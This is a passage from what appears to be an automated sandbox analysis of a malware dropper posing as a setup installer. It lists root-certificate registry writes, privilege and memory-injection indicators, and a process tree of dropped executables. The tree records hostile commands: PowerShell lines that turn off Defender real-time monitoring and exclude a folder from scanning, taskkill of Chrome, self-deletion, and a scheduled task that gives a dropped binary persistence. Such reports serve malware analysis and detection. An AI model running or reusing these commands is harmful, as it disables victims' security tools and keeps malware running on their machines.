d710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 1934523.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun03e4aeb7e43a1c.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun03e4aeb7e43a1c.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd chenxiulan-game.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A 1934523.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1672 Sun0324aba28588c0.exe 1672 Sun0324aba28588c0.exe 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe 1048 powershell.exe 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 2064 Sun03f5d51697d04.tmp 2064 Sun03f5d51697d04.tmp 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
pid Process 1372 Process not Found 972 WerFault.exe 1644 Sun039750b00c.exe 2904 WerFault.exe 2700 WerFault.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1672 Sun0324aba28588c0.exe 3060 cttesev 3044 cttesev 1392 cttesev -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 936 Sun03d477f1a31.exe Token: SeAssignPrimaryTokenPrivilege 936 Sun03d477f1a31.exe Token: SeLockMemoryPrivilege 936 Sun03d477f1a31.exe Token: SeIncreaseQuotaPrivilege 936 Sun03d477f1a31.exe Token: SeMachineAccountPrivilege 936 Sun03d477f1a31.exe Token: SeTcbPrivilege 936 Sun03d477f1a31.exe Token: SeSecurityPrivilege 936 Sun03d477f1a31.exe Token: SeTakeOwnershipPrivilege 936 Sun03d477f1a31.exe Token: SeLoadDriverPrivilege 936 Sun03d477f1a31.exe Token: SeSystemProfilePrivilege 936 Sun03d477f1a31.exe Token: SeSystemtimePrivilege 936 Sun03d477f1a31.exe Token: SeProfSingleProcessPrivilege 936 Sun03d477f1a31.exe Token: SeIncBasePriorityPrivilege 936 Sun03d477f1a31.exe Token: SeCreatePagefilePrivilege 936 Sun03d477f1a31.exe Token: SeCreatePermanentPrivilege 936 Sun03d477f1a31.exe Token: SeBackupPrivilege 936 Sun03d477f1a31.exe Token: SeRestorePrivilege 936 Sun03d477f1a31.exe Token: SeShutdownPrivilege 936 Sun03d477f1a31.exe Token: SeDebugPrivilege 936 Sun03d477f1a31.exe Token: SeAuditPrivilege 936 Sun03d477f1a31.exe Token: SeSystemEnvironmentPrivilege 936 Sun03d477f1a31.exe Token: SeChangeNotifyPrivilege 936 Sun03d477f1a31.exe Token: SeRemoteShutdownPrivilege 936 Sun03d477f1a31.exe Token: SeUndockPrivilege 936 Sun03d477f1a31.exe Token: SeSyncAgentPrivilege 936 Sun03d477f1a31.exe Token: SeEnableDelegationPrivilege 936 Sun03d477f1a31.exe Token: SeManageVolumePrivilege 936 Sun03d477f1a31.exe Token: SeImpersonatePrivilege 936 Sun03d477f1a31.exe Token: SeCreateGlobalPrivilege 936 Sun03d477f1a31.exe Token: 31 936 Sun03d477f1a31.exe Token: 32 936 Sun03d477f1a31.exe Token: 33 936 Sun03d477f1a31.exe Token: 34 936 Sun03d477f1a31.exe Token: 35 936 Sun03d477f1a31.exe Token: SeDebugPrivilege 972 WerFault.exe Token: SeDebugPrivilege 1704 Sun03ea09aa5c9686e5.exe Token: SeDebugPrivilege 1928 Sun0328255c4bce6fb.exe Token: SeDebugPrivilege 1048 powershell.exe Token: SeDebugPrivilege 2580 taskkill.exe Token: SeDebugPrivilege 3012 taskkill.exe Token: SeShutdownPrivilege 1372 Process not Found Token: SeShutdownPrivilege 1372 Process not Found Token: SeDebugPrivilege 2072 DownFlSetup110.exe Token: SeShutdownPrivilege 1372 Process not Found Token: SeDebugPrivilege 2460 2625014.exe Token: SeDebugPrivilege 2412 5.exe Token: SeShutdownPrivilege 1372 Process not Found Token: SeShutdownPrivilege 1372 Process not Found Token: SeShutdownPrivilege 1372 Process not Found Token: SeDebugPrivilege 2864 6.exe Token: SeShutdownPrivilege 1372 Process not Found Token: SeDebugPrivilege 2532 taskkill.exe Token: SeShutdownPrivilege 1372 Process not Found Token: SeDebugPrivilege 2936 taskkill.exe Token: SeShutdownPrivilege 1372 Process not Found Token: SeDebugPrivilege 1136 1934523.exe Token: SeDebugPrivilege 2904 WerFault.exe Token: SeShutdownPrivilege 1372 Process not Found Token: SeDebugPrivilege 2612 Sun03f0dc4460bc9.exe Token: SeShutdownPrivilege 1372 Process not Found Token: SeDebugPrivilege 2460 2625014.exe Token: SeShutdownPrivilege 1372 Process not Found Token: SeShutdownPrivilege 1372 Process not Found Token: SeDebugPrivilege 2940 9529786652.exe -
Suspicious use of FindShellTrayWindow 15 IoCs
pid Process 2064 Sun03f5d51697d04.tmp 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found 1372 Process not Found -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1372 Process not Found 1372 Process not Found 1372 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1672 wrote to memory of 1068 1672 setup_x86_x64_install.exe 28 PID 1672 wrote to memory of 1068 1672 setup_x86_x64_install.exe 28 PID 1672 wrote to memory of 1068 1672 setup_x86_x64_install.exe 28 PID 1672 wrote to memory of 1068 1672 setup_x86_x64_install.exe 28 PID 1672 wrote to memory of 1068 1672 setup_x86_x64_install.exe 28 PID 1672 wrote to memory of 1068 1672 setup_x86_x64_install.exe 28 PID 1672 wrote to memory of 1068 1672 setup_x86_x64_install.exe 28 PID 1068 wrote to memory of 660 1068 setup_installer.exe 29 PID 1068 wrote to memory of 660 1068 setup_installer.exe 29 PID 1068 wrote to memory of 660 1068 setup_installer.exe 29 PID 1068 wrote to memory of 660 1068 setup_installer.exe 29 PID 1068 wrote to memory of 660 1068 setup_installer.exe 29 PID 1068 wrote to memory of 660 1068 setup_installer.exe 29 PID 1068 wrote to memory of 660 1068 setup_installer.exe 29 PID 660 wrote to memory of 1568 660 setup_install.exe 31 PID 660 wrote to memory of 1568 660 setup_install.exe 31 PID 660 wrote to memory of 1568 660 setup_install.exe 31 PID 660 wrote to memory of 1568 660 setup_install.exe 31 PID 660 wrote to memory of 1568 660 setup_install.exe 31 PID 660 wrote to memory of 1568 660 setup_install.exe 31 PID 660 wrote to memory of 1568 660 setup_install.exe 31 PID 660 wrote to memory of 916 660 setup_install.exe 32 PID 660 wrote to memory of 916 660 setup_install.exe 32 PID 660 wrote to memory of 916 660 setup_install.exe 32 PID 660 wrote to memory of 916 660 setup_install.exe 32 PID 660 wrote to memory of 916 660 setup_install.exe 32 PID 660 wrote to memory of 916 660 setup_install.exe 32 PID 660 wrote to memory of 916 660 setup_install.exe 32 PID 660 wrote to memory of 1916 660 setup_install.exe 33 PID 660 wrote to memory of 1916 660 setup_install.exe 33 PID 660 wrote to memory of 1916 660 setup_install.exe 33 PID 660 wrote to memory of 1916 660 setup_install.exe 33 PID 660 wrote to memory of 1916 660 setup_install.exe 33 PID 660 wrote to memory of 1916 660 setup_install.exe 33 PID 660 wrote to memory of 1916 660 setup_install.exe 33 PID 916 wrote to memory of 1048 916 cmd.exe 34 PID 916 wrote to memory of 1048 916 cmd.exe 34 PID 916 wrote to memory of 1048 916 cmd.exe 34 PID 916 wrote to memory of 1048 916 cmd.exe 34 PID 916 wrote to memory of 1048 916 cmd.exe 34 PID 916 wrote to memory of 1048 916 cmd.exe 34 PID 916 wrote to memory of 1048 916 cmd.exe 34 PID 660 wrote to memory of 1104 660 setup_install.exe 35 PID 660 wrote to memory of 1104 660 setup_install.exe 35 PID 660 wrote to memory of 1104 660 setup_install.exe 35 PID 660 wrote to memory of 1104 660 setup_install.exe 35 PID 660 wrote to memory of 1104 660 setup_install.exe 35 PID 660 wrote to memory of 1104 660 setup_install.exe 35 PID 660 wrote to memory of 1104 660 setup_install.exe 35 PID 660 wrote to memory of 576 660 setup_install.exe 36 PID 660 wrote to memory of 576 660 setup_install.exe 36 PID 660 wrote to memory of 576 660 setup_install.exe 36 PID 660 wrote to memory of 576 660 setup_install.exe 36 PID 660 wrote to memory of 576 660 setup_install.exe 36 PID 660 wrote to memory of 576 660 setup_install.exe 36 PID 660 wrote to memory of 576 660 setup_install.exe 36 PID 660 wrote to memory of 524 660 setup_install.exe 37 PID 660 wrote to memory of 524 660 setup_install.exe 37 PID 660 wrote to memory of 524 660 setup_install.exe 37 PID 660 wrote to memory of 524 660 setup_install.exe 37 PID 660 wrote to memory of 524 660 setup_install.exe 37 PID 660 wrote to memory of 524 660 setup_install.exe 37 PID 660 wrote to memory of 524 660 setup_install.exe 37 PID 660 wrote to memory of 1148 660 setup_install.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:660 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵PID:1568
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵PID:456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe4⤵
- Loads dropped DLL
PID:1916 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun03d477f1a31.exeSun03d477f1a31.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:936 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2908
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone4⤵
- Loads dropped DLL
PID:1104 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun033e271e0ce96c08.exeSun033e271e0ce96c08.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1640 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun033e271e0ce96c08.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun033e271e0ce96c08.exe" & exit6⤵PID:2536
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun033e271e0ce96c08.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun039750b00c.exe4⤵
- Loads dropped DLL
PID:576 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun039750b00c.exeSun039750b00c.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe4⤵
- Loads dropped DLL
PID:524 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun03f0dc4460bc9.exeSun03f0dc4460bc9.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1700 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun03f0dc4460bc9.exeC:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun03f0dc4460bc9.exe6⤵
- Executes dropped EXE
PID:2408
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun03f0dc4460bc9.exeC:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun03f0dc4460bc9.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe4⤵
- Loads dropped DLL
PID:1148 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun03e4aeb7e43a1c.exeSun03e4aeb7e43a1c.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:276 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\9821690663.exe"6⤵PID:2476
-
C:\Users\Admin\AppData\Local\Temp\9821690663.exe"C:\Users\Admin\AppData\Local\Temp\9821690663.exe"7⤵
- Executes dropped EXE
PID:2516
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\9529786652.exe"6⤵PID:2668
-
C:\Users\Admin\AppData\Local\Temp\9529786652.exe"C:\Users\Admin\AppData\Local\Temp\9529786652.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun03e4aeb7e43a1c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun03e4aeb7e43a1c.exe" & exit6⤵PID:2568
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun03e4aeb7e43a1c.exe" /f7⤵
- Kills process with taskkill
PID:3064
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe4⤵
- Loads dropped DLL
PID:1320 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun0397381f1f458e.exeSun0397381f1f458e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1716 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun0397381f1f458e.exe"C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun0397381f1f458e.exe" -u6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1488
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe4⤵
- Loads dropped DLL
PID:840 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun0324aba28588c0.exeSun0324aba28588c0.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe4⤵
- Loads dropped DLL
PID:1400 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun038aa349e3318e.exeSun038aa349e3318e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe4⤵
- Loads dropped DLL
PID:1596 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun038db98f99bf9a.exeSun038db98f99bf9a.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0351a0558292.exe4⤵
- Loads dropped DLL
PID:1820 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun0351a0558292.exeSun0351a0558292.exe5⤵
- Executes dropped EXE
PID:1788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe4⤵
- Loads dropped DLL
PID:1476 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun03ea09aa5c9686e5.exeSun03ea09aa5c9686e5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1704 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:2648 -
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
- Executes dropped EXE
PID:3052 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:1624
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:2260
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
PID:2900
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:2200
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵
- Executes dropped EXE
PID:2608 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Suspicious use of SetThreadContext
PID:2484 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵
- Executes dropped EXE
PID:1976 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵PID:2368
-
-
-
